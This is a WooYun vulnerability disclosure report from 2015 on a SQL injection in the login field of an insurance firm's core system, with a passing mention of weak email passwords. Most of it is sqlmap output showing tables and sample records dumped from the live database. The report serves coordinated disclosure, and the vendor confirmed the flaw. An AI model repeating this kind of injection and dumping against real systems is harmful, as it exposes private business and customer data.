漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0131660
漏洞标题:泛华保险某核心系统DBA注射(25库)/弱口令
相关厂商:pywm.com.cn
漏洞作者: 路人甲
提交时间:2015-08-04 20:17
修复时间:2015-09-20 12:00
公开时间:2015-09-20 12:00
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-08-04: 细节已通知厂商并且等待厂商处理中
2015-08-06: 厂商已经确认,细节仅向厂商公开
2015-08-16: 细节向核心白帽子及相关领域专家公开
2015-08-26: 细节向普通白帽子公开
2015-09-05: 细节向实习白帽子公开
2015-09-20: 细节向公众公开
简要描述:
注射。你懂的!
详细说明:
登录入口抓包
参数usercode可注射
sqlmap
当前权限
当前库
证明,不深入
=============================================================
另外附送邮箱弱口令
漏洞证明:
随机dump出几条证明
[19:53:45] [INFO] fetching tables for database: 'CBSOPR'
[19:53:45] [INFO] the SQL query used returns 18 entries
[19:53:45] [INFO] resumed: T_LSBLYY_20130509
[19:53:45] [INFO] resumed: CHENTEMPTABLE
[19:53:45] [INFO] resumed: CHENTEMPTABLE2
[19:53:45] [INFO] resumed: AGENTTEMPTABLE
[19:53:45] [INFO] resumed: TEMPTYPE
[19:53:45] [INFO] resumed: CCH02
[19:53:45] [INFO] resumed: T_LSBLYY_20121020
[19:53:45] [INFO] resumed: CHENFZCARD
[19:53:45] [INFO] resumed: ERROR_LSB_U_CONTNO
[19:53:45] [INFO] resumed: CCHENTEMPTABLEZN
[19:53:45] [INFO] resumed: FAAGENTTEMP
[19:53:45] [INFO] resumed: FAAGENTTEMP2
[19:53:45] [INFO] resumed: CCH01
[19:53:45] [INFO] resumed: FAAGENTTEMP1
[19:53:45] [INFO] resumed: TEMPQRY
[19:53:45] [INFO] resumed: TESTQRY1
[19:53:45] [INFO] resumed: TESTQRY2
[19:53:45] [INFO] resumed: CCH03
[19:53:45] [INFO] fetching columns for table 'CCH03' in database 'CBSOPR'
[19:53:45] [INFO] the SQL query used returns 5 entries
[19:53:45] [INFO] resumed: COL1
[19:53:45] [INFO] resumed: VARCHAR2
[19:53:45] [INFO] resumed: COL2
[19:53:45] [INFO] resumed: NUMBER
[19:53:45] [INFO] resumed: COL3
[19:53:45] [INFO] resumed: NUMBER
[19:53:45] [INFO] resumed: COL4
[19:53:45] [INFO] resumed: NUMBER
[19:53:45] [INFO] resumed: COL5
[19:53:45] [INFO] resumed: NUMBER
[19:53:45] [INFO] fetching entries for table 'CCH03' in database 'CBSOPR'
[19:53:46] [INFO] the SQL query used returns 15 entries
[19:53:51] [INFO] retrieved: 26101028033001130000128
[19:53:51] [INFO] retrieved: 0
[19:53:51] [INFO] retrieved: 0
[19:53:52] [INFO] retrieved: .05
[19:53:52] [INFO] retrieved: 216.85
[19:53:52] [INFO] retrieved: 26101028033001130000127
[19:53:53] [INFO] retrieved: 0
[19:53:53] [INFO] retrieved: 0
[19:53:53] [INFO] retrieved: .05
[19:53:54] [INFO] retrieved: 186.99
[19:53:54] [INFO] retrieved: 26101028033001130000126
[19:53:54] [INFO] retrieved: 0
[19:53:55] [INFO] retrieved: 0
[19:53:55] [INFO] retrieved: .05
[19:53:55] [INFO] retrieved: 269.18
[19:53:56] [INFO] retrieved: 26101028033001130000125
[19:53:56] [INFO] retrieved: 0
[19:53:56] [INFO] retrieved: 0
[19:53:57] [INFO] retrieved: .05
[19:53:57] [INFO] retrieved: 127.21
[19:53:57] [INFO] retrieved: 26101028033001130000122
[19:53:58] [INFO] retrieved: 0
[19:53:58] [INFO] retrieved: 0
[19:53:58] [INFO] retrieved: .05
[19:53:58] [INFO] retrieved: 125.67
[19:53:59] [WARNING] user aborted during enumeration. sqlmap will display partia
l output
[19:53:59] [INFO] analyzing table dump for possible password hashes
Database: CBSOPR
Table: CCH03
[5 entries]
+------+--------+------+------+-------------------------+
| COL4 | COL5 | COL2 | COL3 | COL1 |
+------+--------+------+------+-------------------------+
| .05 | 216.85 | 0 | 0 | 26101028033001130000128 |
| .05 | 186.99 | 0 | 0 | 26101028033001130000127 |
| .05 | 269.18 | 0 | 0 | 26101028033001130000126 |
| .05 | 127.21 | 0 | 0 | 26101028033001130000125 |
| .05 | 125.67 | 0 | 0 | 26101028033001130000122 |
+------+--------+------+------+-------------------------+
[19:53:59] [INFO] table 'CBSOPR.CCH03' dumped to CSV file 'C:\Users\Administrat0
r\.sqlmap\output\cbs.cninsure.net\dump\CBSOPR\CCH03.csv'
[19:53:59] [INFO] fetching columns for table 'AGENTTEMPTABLE' in database 'CBSOP
R'
[19:53:59] [INFO] the SQL query used returns 3 entries
[19:54:00] [INFO] retrieved: COL1
[19:54:00] [INFO] retrieved: VARCHAR2
[19:54:00] [INFO] retrieved: COL2
[19:54:01] [INFO] retrieved: VARCHAR2
[19:54:01] [INFO] retrieved: COL3
[19:54:02] [INFO] retrieved: VARCHAR2
[19:54:02] [INFO] fetching entries for table 'AGENTTEMPTABLE' in database 'CBSOP
R'
[19:54:02] [INFO] the SQL query used returns 57 entries
[19:54:03] [INFO] retrieved: 620363803
[19:54:04] [INFO] retrieved: T620363803
[19:54:07] [INFO] retrieved: 620364115
[19:54:07] [INFO] retrieved: T620364115
[19:54:08] [INFO] retrieved: 620363829
[19:54:08] [INFO] retrieved: T620363829
[19:54:08] [INFO] retrieved: 620363916
[19:54:09] [INFO] retrieved: T620363916
[19:54:09] [INFO] retrieved: 620363836
[19:54:09] [INFO] retrieved: T620363836
[19:54:10] [INFO] retrieved: 620363846
[19:54:10] [INFO] retrieved: T620363846
[19:54:10] [INFO] retrieved: 620363850
[19:54:11] [INFO] retrieved: T620363850
[19:54:11] [INFO] retrieved: 620363918
[19:54:12] [INFO] retrieved: T620363918
[19:54:12] [INFO] retrieved: 620363853
[19:54:12] [INFO] retrieved: T620363853
[19:54:13] [INFO] retrieved: 620363861
[19:54:13] [INFO] retrieved: T620363861
[19:54:13] [INFO] retrieved: 620363872
[19:54:14] [INFO] retrieved: T620363872
[19:54:14] [INFO] retrieved: 620363876
[19:54:14] [INFO] retrieved: T620363876
[19:54:15] [INFO] retrieved: 620363888
[19:54:15] [INFO] retrieved: T620363888
[19:54:15] [INFO] retrieved: 620363900
[19:54:16] [INFO] retrieved: T620363900
[19:54:16] [INFO] retrieved: 620363911
[19:54:17] [WARNING] user aborted during enumeration. sqlmap will display partia
l output
[19:54:17] [INFO] analyzing table dump for possible password hashes
Database: CBSOPR
Table: AGENTTEMPTABLE
[14 entries]
+------------+------+-----------+
| COL2 | COL3 | COL1 |
+------------+------+-----------+
| T620363803 | NULL | 620363803 |
| T620364115 | NULL | 620364115 |
| T620363829 | NULL | 620363829 |
| T620363916 | NULL | 620363916 |
| T620363836 | NULL | 620363836 |
| T620363846 | NULL | 620363846 |
| T620363850 | NULL | 620363850 |
| T620363918 | NULL | 620363918 |
| T620363853 | NULL | 620363853 |
| T620363861 | NULL | 620363861 |
| T620363872 | NULL | 620363872 |
| T620363876 | NULL | 620363876 |
| T620363888 | NULL | 620363888 |
| T620363900 | NULL | 620363900 |
+------------+------+-----------+
[19:54:17] [INFO] table 'CBSOPR.AGENTTEMPTABLE' dumped to CSV file 'C:\Users\Adm
inistrat0r\.sqlmap\output\cbs.cninsure.net\dump\CBSOPR\AGENTTEMPTABLE.csv'
[19:54:17] [INFO] fetching columns for table 'CCH01' in database 'CBSOPR'
[19:54:17] [INFO] the SQL query used returns 10 entries
[19:54:17] [INFO] retrieved: COL1
[19:54:18] [INFO] retrieved: VARCHAR2
[19:54:18] [INFO] retrieved: COL2
[19:54:18] [INFO] retrieved: VARCHAR2
[19:54:19] [INFO] retrieved: COL3
[19:54:19] [INFO] retrieved: NUMBER
[19:54:20] [INFO] retrieved: COL4
[19:54:20] [INFO] retrieved: NUMBER
[19:54:20] [INFO] retrieved: COL5
[19:54:21] [INFO] retrieved: NUMBER
[19:54:21] [INFO] retrieved: COL6
[19:54:21] [INFO] retrieved: NUMBER
[19:54:22] [INFO] retrieved: COL7
[19:54:22] [INFO] retrieved: NUMBER
[19:54:22] [INFO] retrieved: COL8
[19:54:23] [INFO] retrieved: NUMBER
[19:54:23] [INFO] retrieved: COL9
[19:54:23] [INFO] retrieved: NUMBER
[19:54:24] [INFO] retrieved: COL10
[19:54:24] [INFO] retrieved: VARCHAR2
[19:54:24] [INFO] fetching entries for table 'CCH01' in database 'CBSOPR'
[19:54:25] [INFO] the SQL query used returns 444 entries
[19:54:28] [WARNING] user aborted during enumeration. sqlmap will display partia
l output
[19:54:28] [INFO] fetching number of entries for table 'CCH01' in database 'CBSO
PR'
[19:54:28] [INFO] resumed: 444
[19:54:28] [INFO] resumed: 444
[19:54:28] [INFO] resumed: 444
[19:54:28] [INFO] resumed: 0
[19:54:28] [INFO] resumed: 0
[19:54:28] [INFO] resumed: 444
[19:54:28] [INFO] resumed: 444
[19:54:28] [INFO] resumed: 444
[19:54:28] [INFO] resumed: 444
[19:54:28] [INFO] resumed: 444
[19:54:28] [INFO] resumed: 444
[19:54:28] [INFO] retrieved:
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2015-08-06 11:59
厂商回复:
感谢
最新状态:
暂无